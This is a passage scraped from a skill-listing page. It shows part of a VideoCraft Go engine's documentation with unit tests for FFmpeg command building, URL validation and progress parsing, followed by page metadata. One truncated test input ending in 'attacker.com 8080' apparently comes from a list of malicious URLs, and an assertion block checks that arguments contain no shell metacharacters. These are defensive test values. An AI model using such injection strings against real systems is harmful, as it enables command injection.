attacker.com 8080\",\n }\n \n service := NewService(cfg, logger.NewNoop())\n \n for _, maliciousURL := range maliciousURLs {\n t.Run(maliciousURL, func(t *testing.T) {\n err := service.ValidateURL(maliciousURL)\n assert.Error(t, err, \"Should reject malicious URL: %s\", maliciousURL)\n })\n }\n}\n\nfunc TestEngineService_CommandConstruction(t *testing.T) {\n config := &models.VideoConfigArray{\n {\n Scenes: []models.Scene{{\n ID: \"scene1\",\n Elements: []models.Element{\n {\n Type: \"audio\",\n Src: \"https://example.com/audio.mp3\",\n Duration: 30.0,\n },\n {\n Type: \"image\",\n Src: \"https://example.com/image.jpg\",\n X: 100,\n Y: 100,\n },\n },\n }},\n Elements: []models.Element{\n {\n Type: \"video\",\n Src: \"https://example.com/background.mp4\",\n Duration: 60.0,\n },\n },\n Quality: \"high\",\n Width: 1920,\n Height: 1080,\n },\n }\n \n service := NewService(cfg, logger.NewNoop())\n \n // Test command building\n cmd, err := service.BuildCommand(config)\n require.NoError(t, err)\n assert.NotEmpty(t, cmd.Args)\n assert.NotEmpty(t, cmd.OutputPath)\n \n // Verify security: no dangerous characters in arguments\n for _, arg := range cmd.Args {\n assert.NotContains(t, arg, \";\")\n assert.NotContains(t, arg, \"|\")\n assert.NotContains(t, arg, \"&\")\n assert.NotContains(t, arg, \"`\")\n assert.NotContains(t, arg, \"$\")\n }\n \n // Verify expected arguments\n argString := strings.Join(cmd.Args, \" \")\n assert.Contains(t, argString, \"-y\")\n assert.Contains(t, argString, \"-protocol_whitelist\")\n assert.Contains(t, argString, \"file,http,https,tcp,tls\")\n assert.Contains(t, argString, \"-c:v\")\n assert.Contains(t, argString, \"libx264\")\n assert.Contains(t, argString, \"-crf\")\n assert.Contains(t, argString, \"18\") // High quality CRF\n}\n```\n\n### Integration Testing\n\n```go\nfunc TestEngineService_ProgressTracking(t *testing.T) {\n service := NewService(cfg, logger.NewNoop())\n \n // Create a mock stderr output\n stderrContent := `\nDuration: 00:00:30.00, start: 0.000000, bitrate: 128 kb/s\ntime=00:00:05.00 bitrate=128.0kbits/s speed=2.5x\ntime=00:00:10.00 bitrate=128.0kbits/s speed=2.4x\ntime=00:00:15.00 bitrate=128.0kbits/s speed=2.3x\ntime=00:00:20.00 bitrate=128.0kbits/s speed=2.2x\ntime=00:00:25.00 bitrate=128.0kbits/s speed=2.1x\ntime=00:00:30.00 bitrate=128.0kbits/s speed=2.0x\n`\n \n stderr := io.NopCloser(strings.NewReader(stderrContent))\n progressChan := make(chan int, 10)\n \n // Test progress parsing\n go service.parseProgress(stderr, progressChan)\n \n var progressUpdates []int\n for progress := range progressChan {\n progressUpdates = append(progressUpdates, progress)\n }\n \n // Verify progress updates\n assert.NotEmpty(t, progressUpdates)\n assert.Equal(t, 100, progressUpdates[len(progressUpdates)-1]) // Final progress should be 100%\n \n // Verify progress is increasing\n for i := 1; i < len(progressUpdates); i++ {\n assert.GreaterOrEqual(t, progressUpdates[i], progressUpdates[i-1])\n }\n}\n```\n\n---\n\n**Related Documentation:**\n- [Video Engine Overview](../CLAUDE.md)\n- [Service Composition](../composition/CLAUDE.md)\n- [Core Services](../../services/CLAUDE.md)\n- [Security Architecture](../../../../security/CLAUDE.md)","sourceUrl","https://github.com/activadee/videocraft/blob/6045a2c9ec74716b65e111e245f5e595af0675d6/internal/core/video/engine/CLAUDE.md","sourceRepo","activadee/videocraft","sourcePath","internal/core/video/engine/CLAUDE.md","viewCount",0,"createdAt",["D",1770923486000],"status","published","skillType","prompt","difficulty",1,"timeToValueMin",5,"useCases","[]","inputs","outputFormat","markdown","dependencies","categoryId","b31af42c-ecda-40ee-a2ca-9845bad35f56","categoryName","Coding","categorySlug","coding","authorName","authorImage","hasAdditionalFiles",false,"fileCount","totalSizeBytes","skillCategories",[57],{"_11":44,"_58":46,"_59":48},"name","slug","relatedSkills",[62,68,74],{"_11":63,"_13":64,"_15":65,"_45":46,"_47":48,"_25":66,"_27":67,"_31":32,"_33":34,"_35":36,"_40":41},"20883adf-3530-4398-a914-716aa3783689","Markdown Converter","Agent skill for markdown-converter",23,["D",1767894033000],{"_11":69,"_13":70,"_15":71,"_45":46,"_47":48,"_25":72,"_27":73,"_31":32,"_33":34,"_35":36,"_40":41},"b404ec38-bffb-4822-8916-4480ffb7cb0c","Nano Banana Pro","Agent skill for nano-banana-pro",19,["D",1767894033000],{"_11":75,"_13":76,"_15":77,"_45":46,"_47":48,"_25":78,"_27":79,"_31":32,"_33":34,"_35":36,"_40":41},"525e6c82-58f2-4312-bfd2-c2972bb23e56","1password","Agent skill for 1password",18,["D",1767894032000],"session","userInteractions",{"_83":52,"_84":52},"liked","favorited","additionalFiles",[],"actionData","errors"]

VideoCraft Video Engine - FFmpeg Integration & Security-First Command Construction

Related Skills

Markdown Converter

Nano Banana Pro

1password